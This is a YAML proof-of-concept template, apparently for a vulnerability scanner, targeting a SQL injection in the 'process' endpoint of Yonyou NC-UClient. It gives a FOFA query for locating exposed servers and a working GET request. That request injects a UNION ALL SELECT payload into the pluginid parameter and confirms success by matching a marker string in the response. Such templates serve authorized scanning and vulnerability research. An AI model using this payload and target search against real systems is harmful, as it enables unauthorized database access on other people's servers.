product: 用友NC-UClient
vName: 用友NC-UClient process接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友NClient process接口存在SQL注入漏洞。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://github.com/wy876/POC/blob/main/用友OA/用友NC-process存在SQL注入漏洞.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/pt/task/process?pageId=login&id=1&pluginid=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(98)||CHR(48)||CHR(98)||CHR(101)||CHR(102)||CHR(49)||CHR(48)||CHR(97)||CHR(46)||CHR(46),NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - b0bef10a.
              - Plugin
            logic: 'and'